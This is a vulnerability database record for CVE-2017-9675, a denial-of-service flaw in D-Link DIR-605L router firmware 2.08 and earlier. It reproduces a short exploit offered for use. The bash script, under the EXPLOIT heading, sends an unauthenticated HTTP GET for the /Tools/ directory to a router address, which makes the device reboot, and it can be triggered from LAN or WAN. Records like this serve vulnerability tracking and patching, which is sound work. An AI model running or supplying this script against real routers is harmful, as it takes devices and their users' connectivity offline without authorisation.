Details of VAR-E-201711-0254

ID

VAR-E-201711-0254

TITLE

DLink DIR-605L < 2.08 - Denial of Service Exploit

Trust: 0.6

sources: EDBNET: 95140

AFFECTED PRODUCTS

vendor:

dlink

model:

dir-605l

scope:

version:

2.08

Trust: 0.6

sources: EDBNET: 95140

EXPLOIT

# Exploit Title: D-Link DIR605L <=2.08 Denial of Service via HTTP GET (CVE-2017-9675)
# Date: 2017-11-14
# Exploit Author: Enrique Castillo
# Contact: https://twitter.com/_hyperlogic
# Detailed Analysis: http://hypercrux.com/bug-report/2017/06/19/DIR605L-DoS-BugReport/
# Vendor Homepage: http://us.dlink.com/
# Software Link: specific version no longer available on vendor site
# Version: 2.08UI and prior
# CVE : CVE-2017-9675
# Tested on Linux
###
# Description: Firmware versions 2.08UI and lower contain a bug in the function that handles HTTP GET requests for
# directory paths that can allow an unauthenticated attacker to cause complete denial of service (device reboot). This bug can be triggered
# from both LAN and WAN.
###
#!/usr/bin/env bash
# usage: ./sploit.sh <router_ip>
ROUTER=$1
if [ "$#" -ne 1 ]; then
echo "usage: $0 <router_ip>"
exit
fi
curl http://$ROUTER/Tools/

Trust: 0.6

sources: EDBNET: 95140

PRICE

free

Trust: 0.6

sources: EDBNET: 95140

TYPE

Denial of Service Exploit

Trust: 0.6

sources: EDBNET: 95140

EXTERNAL IDS

db:	0DAYTODAY	id:	29006	Trust: 0.6
db:	EDBNET	id:	95140	Trust: 0.6

sources: EDBNET: 95140

REFERENCES

url:

https://0day.today/exploits/29006

Trust: 0.6

sources: EDBNET: 95140

SOURCES

db:

EDBNET

id:

95140

LAST UPDATE DATE

2022-07-27T09:39:58.799000+00:00

SOURCES RELEASE DATE

db:

EDBNET

id:

95140

date:

2017-11-29T00:00:00